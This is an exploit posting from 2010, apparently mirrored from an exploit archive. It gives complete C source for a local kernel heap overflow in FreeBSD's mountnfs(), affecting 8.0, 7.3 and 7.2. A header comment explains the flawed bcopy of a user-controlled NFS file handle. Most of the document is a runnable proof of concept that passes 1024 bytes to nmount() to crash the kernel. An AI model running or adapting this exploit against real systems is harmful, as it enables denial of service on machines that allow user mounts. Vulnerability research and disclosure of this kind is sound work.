FreeBSD Kernel mountnfs() Exploit
Posted on 23 June 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>FreeBSD Kernel mountnfs() Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>================================= FreeBSD Kernel mountnfs() Exploit ================================= /* * mountnfsex.c -- Patroklos Argyroudis, argp at domain census-labs.com * * Local kernel exploit for FreeBSD 8.0, 7.3 and 7.2. * * Discovered and exploited by Patroklos (argp) Argyroudis. * * The vulnerability is in mountnfs() which is reachable by the mount(2) * and nmount(2) system calls. In order for them to be enabled for * unprivileged users the sysctl(8) variable vfs.usermount must be set to * a non-zero value. * * mountnfs() employs an insufficient input validation method for copying * data passed in the struct nfs_args from userspace to kernel. * Specifically, the file handle to be mounted (nfs_args.fh) and its size * (nfs_args.fhsize) are completely user-controllable. In file * sys/nfsclient/nfs_vfsops.c from 8.0-RELEASE: * * 1219 bcopy((caddr_t)argp->fh, (caddr_t)nmp->nm_fh, argp->fhsize); * * The above can cause a kernel heap overflow when argp->fh is bigger than * 128 bytes (the size of nmp->nm_fh) since nmp is an allocated item on * the UMA zone nfsmount_zone (again from sys/nfsclient/nfs_vfsops.c): * * 1164 struct nfsmount *nmp; * ... * 1175 nmp = uma_zalloc(nfsmount_zone, M_WAITOK); * * The result is a kernel crash/denial-of-service. I have developed a code * execution/privilege escalation exploit, but I will not release it at this * point. 7.1-RELEASE and earlier do not seem to be vulnerable since the * bug was introduced in 7.2-RELEASE. * * $Id: mountnfsex.c,v c1302ea1317d 2010/05/23 17:30:17 argp $ */ #include <sys/param.h> #include <sys/mount.h> #include <sys/uio.h> #include <err.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sysexits.h> #include <unistd.h> #include <sys/types.h> #include <sys/stat.h> #include <errno.h> #define BUFSIZE 1024 #define FSNAME "nfs" #define DIRPATH "/tmp/nfs" int main() { struct iovec iov[8]; mkdir(DIRPATH, 0700); iov[0].iov_base = "fstype"; iov[0].iov_len = strlen(iov[0].iov_base) + 1; iov[1].iov_base = FSNAME; iov[1].iov_len = strlen(iov[1].iov_base) + 1; iov[2].iov_base = "fspath"; iov[2].iov_len = strlen(iov[2].iov_base) + 1; iov[3].iov_base = DIRPATH; iov[3].iov_len = strlen(iov[3].iov_base) + 1; iov[4].iov_base = "fh"; iov[4].iov_len = strlen(iov[4].iov_base) + 1; iov[5].iov_base = calloc(BUFSIZE, sizeof(char)); if(iov[5].iov_base == NULL) { perror("calloc"); rmdir(DIRPATH); exit(EXIT_FAILURE); } memset(iov[5].iov_base, 0x41, (BUFSIZE - 1)); iov[5].iov_len = BUFSIZE; iov[6].iov_base = "hostname"; iov[6].iov_len = strlen(iov[6].iov_base) + 1; iov[7].iov_base = "census-labs.com"; iov[7].iov_len = strlen(iov[7].iov_base) + 1; printf("[*] calling nmount() "); if(nmount(iov, 8, 0) < 0) { fprintf(stderr, "[!] nmount error: %d ", errno); perror("nmount"); rmdir(DIRPATH); free(iov[5].iov_base); exit(1); } printf("[*] unmounting and deleting %s ", DIRPATH); unmount(DIRPATH, 0); rmdir(DIRPATH); free(iov[5].iov_base); return 0; } /* EOF */ # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-23]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
